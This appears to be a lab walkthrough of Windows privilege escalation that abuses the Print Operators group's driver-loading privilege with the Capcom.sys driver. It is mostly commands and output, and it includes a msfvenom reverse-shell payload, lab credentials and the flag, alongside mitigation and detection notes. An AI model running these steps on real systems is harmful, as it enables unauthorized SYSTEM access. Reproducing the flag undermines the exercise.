Print Operators group grants SeLoadDriverPrivilege, allowing members to load device drivers. This privilege can be exploited to load malicious drivers like Capcom.sys for SYSTEM privilege escalation.
# Print Operators privileges:
SeLoadDriverPrivilege # Load and unload device drivers
SeShutdownPrivilege # Shut down Domain Controller
# Plus: manage printers, log on locally to DC# Check privileges (may need UAC bypass first)
whoami /priv
# Expected output:
SeLoadDriverPrivilege Load and unload device drivers Disabled# Add driver reference to registry
reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"
reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1
# NT Object Path syntax: \??\ for driver location# Method A: Use EnableSeLoadDriverPrivilege.exe
EnableSeLoadDriverPrivilege.exe
# Expected output:
SeLoadDriverPrivilege Enabled
NTSTATUS: 00000000, WinError: 0
# Method B: Automated with EoPLoadDriver
EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys# Execute ExploitCapcom.exe
ExploitCapcom.exe
# Expected result:
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000070
[*] Shellcode was placed at 0000024822A50008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched- Credentials:
printsvc:HTB_@cademy_stdnt! - Access Method: xfreerdp
- Tools Location:
C:\Tools\andC:\Tools\ExploitCapcom\ - Objective: Escalate to SYSTEM and retrieve flag from Administrator desktop
- Flag:
Pr1nt_0p3rat0rs_ftw!
# Connect to target using xfreerdp
xfreerdp /v:TARGET_IP /u:printsvc /p:HTB_@cademy_stdnt!
# Example output:
[16:18:25:879] [4321:4323] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[16:18:25:880] [4321:4323] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr# Right-click Command Prompt → "Run as administrator"
# Supply credentials: printsvc:HTB_@cademy_stdnt! when promptedcd C:\Tools
EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys
# Expected output:
RegCreateKeyEx failed: 0x0
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-454284637-3659702366-2958135535-1103\System\CurrentControlSet\Capcom
NTSTATUS: 00000000, WinError: 0cd ExploitCapcom
ExploitCapcom.exe
# Expected output:
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000070
[*] Shellcode was placed at 0000016476420008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this programtype C:\Users\Administrator\Desktop\flag.txt
# Flag: Pr1nt_0p3rat0rs_ftw!// Modify ExploitCapcom.cpp line 292 for reverse shell:
TCHAR CommandLine[] = TEXT("C:\\ProgramData\\revshell.exe");
// Generate reverse shell with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f exe -o revshell.exe# Single command with EoPLoadDriver
EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys
# Then exploit with ExploitCapcom.exe# Remove registry key
reg delete HKCU\System\CurrentControlSet\Capcom
# Confirm deletion:
Permanently delete the registry key? Yes
The operation completed successfully.# MITIGATED: Windows 10 Version 1803+
# SeLoadDriverPrivilege no longer exploitable
# Cannot reference HKEY_CURRENT_USER registry keys# Monitor for:
- Driver loading events
- Registry modifications under CurrentControlSet
- Capcom.sys driver presence
- Privilege escalation to SYSTEM- Print Operators group provides SeLoadDriverPrivilege
- Capcom.sys driver enables SYSTEM privilege escalation
- Registry configuration required for driver loading
- Multiple tools available for automation
- Mitigated on Windows 10 1803+
Print Operators group exploitation relies on vulnerable driver loading capabilities, effective primarily on legacy Windows systems.